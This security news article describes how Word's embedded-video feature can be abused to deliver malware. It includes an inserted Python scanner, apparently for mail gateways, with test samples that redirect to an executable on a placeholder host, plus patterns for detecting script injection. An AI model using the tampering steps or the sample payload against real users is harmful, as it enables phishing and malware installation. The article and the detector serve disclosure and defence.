A feature that allows anyone to embed a video directly in a Word document can be easily misused to trick target users into downloading and running malware, Cymulate researchers have demonstrated.

The attack

Producing a document that will deliver the malicious payload is easy.

An attacker first creates a Word document, fills it with whatever content they deem appropriate, uses the Insert -> Online Video option to add a YouTube video to the document, and saves the file.

The saved file is then unpacked, either with an archive tool or by renaming the .docx extension to .zip and extracting it. A .docx is an Office Open XML package, and the document body lives in an XML file called document.xml inside its word folder, which the attacker opens and edits.

The YouTube iframe code for the video is stored in that file as the value of the embeddedHtml attribute. The attacker replaces it with malicious HTML or JavaScript of their choosing, saves the change, repacks the .docx, and then finds a way to deliver the file to the target and convince them to open it and click the embedded video to play it.

Because Word renders the embedded HTML with the Internet Explorer engine, the click triggers the download of the embedded executable through the Internet Explorer Download Manager. The target is asked whether to run or save the file, but gets no warning about the possible dangers of doing so. And, unfortunately, many users don't think twice about clicking through the prompts and approving the action if their interest is piqued.
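The check that the advice to administrators at the end of this article calls for, as an added example that is not Cymulate's code and not part of the original article: a Python scanner that unzips a .docx, pulls every embeddedHtml attribute out of word/document.xml and flags any whose HTML is not a single plain YouTube iframe. The element that carries the attribute (wp15:webVideoPr), the allowed-host list and the sample payloads under the reserved .invalid domain are assumptions constructed for the example; the .docx it builds in memory contains only the parts the scanner reads.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse
from xml.sax.saxutils import quoteattr

# Hosts a legitimately inserted Online Video is expected to point at
# (assumption: the Insert -> Online Video dialog emits a youtube.com embed iframe).
ALLOWED_HOSTS = {"youtube.com", "www.youtube.com", "www.youtube-nocookie.com"}

IFRAME_SRC = re.compile(r'<iframe\b[^>]*\bsrc\s*=\s*["\']([^"\']+)["\']', re.I)
ACTIVE_CONTENT = re.compile(
    r'<\s*(script|object|embed|applet|meta|form)\b|\son[a-z]+\s*=|javascript:', re.I)


def embedded_html_blocks(docx_bytes: bytes) -> list:
    """Return every embeddedHtml attribute value found in word/document.xml.

    Matching is on the attribute's local name only, so the element carrying it
    (wp15:webVideoPr in real files, an assumption here) and its namespace do not
    matter. ElementTree unescapes &lt;/&gt;, so the strings returned are the raw
    HTML that Word would render when the video is clicked.
    """
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as pkg:
        root = ET.fromstring(pkg.read("word/document.xml"))
    return [
        value
        for element in root.iter()
        for name, value in element.attrib.items()
        if name.rsplit("}", 1)[-1] == "embeddedHtml"
    ]


def classify(html: str) -> str:
    """'benign' only for a single plain YouTube iframe; everything else is 'suspicious'."""
    srcs = IFRAME_SRC.findall(html)
    if len(srcs) != 1:
        return "suspicious"   # no iframe at all, or extra frames smuggled in
    if urlparse(srcs[0]).hostname not in ALLOWED_HOSTS:
        return "suspicious"   # the frame points somewhere other than YouTube
    if ACTIVE_CONTENT.search(html):
        return "suspicious"   # script, event handlers or other active content beside the frame
    return "benign"


def scan_docx(docx_bytes: bytes, strict: bool = False) -> dict:
    """Scan one .docx. strict=True blocks any embedded video, as the article's
    advice to administrators suggests; otherwise only tampered ones are blocked."""
    blocks = embedded_html_blocks(docx_bytes)
    verdicts = [classify(h) for h in blocks]
    return {
        "video_count": len(blocks),
        "verdicts": verdicts,
        "block": bool(blocks) if strict else any(v != "benign" for v in verdicts),
    }


def make_docx(embedded_html: str) -> bytes:
    """Build a minimal, constructed .docx in memory with one online-video placeholder.
    Only word/document.xml is populated; Word itself would need more package parts."""
    document_xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"'
        ' xmlns:wp15="http://schemas.microsoft.com/office/word/2012/wordprocessingDrawing">'
        '<w:body><w:p><w:r><w:drawing>'
        '<wp15:webVideoPr embeddedHtml=' + quoteattr(embedded_html) + ' h="360" w="640"/>'
        '</w:drawing></w:r></w:p></w:body></w:document>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as pkg:
        pkg.writestr("[Content_Types].xml", "<Types/>")
        pkg.writestr("word/document.xml", document_xml)
    return buf.getvalue()


# Constructed samples: what the dialog would insert, and two tampered variants.
BENIGN_HTML = ('<iframe width="640" height="360" src="https://www.youtube.com/embed/VIDEO_ID"'
               ' frameborder="0" allowfullscreen></iframe>')
SCRIPT_HTML = BENIGN_HTML + '<script>window.location="http://payload.invalid/update.exe"</script>'
REDIRECT_HTML = '<iframe width="640" height="360" src="https://cdn.payload.invalid/v.html"></iframe>'

if __name__ == "__main__":
    for label, html in (("benign", BENIGN_HTML), ("script", SCRIPT_HTML), ("redirect", REDIRECT_HTML)):
        print(label, scan_docx(make_docx(html)))
```

The scanner deliberately matches on the attribute name rather than a fixed element path, so it still fires if the attribute is moved to another element, and it treats anything beyond one YouTube iframe as hostile rather than trying to enumerate bad patterns; a mail gateway that wants the blanket policy from the end of the article simply calls it with strict=True.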

“Attackers could use this for malicious purposes such as phishing, as the document will show the embedded online video with a link to YouTube, while disguising a hidden HTML/JavaScript code that will be running in the background and could potentially lead to further code execution scenarios,” Cymulate CTO Avihai Ben-Yossef pointed out.

What now?

The researchers consider this a bug and a security flaw, and say it has the potential to affect all users of Office 2016 and older versions of the productivity suite.

Microsoft has been notified, but for now has no plans to fix it, as the software is "properly interpreting HTML as designed."

But if the feature starts getting widely abused they might end up doing something about it.

A similar situation played out last year with the Dynamic Data Exchange (DDE) feature in Word: after a considerable increase in malware campaigns abusing it, Microsoft initially said it was a feature, not a bug, and only offered mitigation advice, but ultimately disabled DDE by default to stem the malicious tide.

In the meantime, users are advised not to open unsolicited email attachments from unknown or suspicious sources, and enterprise administrators are advised to block Word documents containing an embedded video.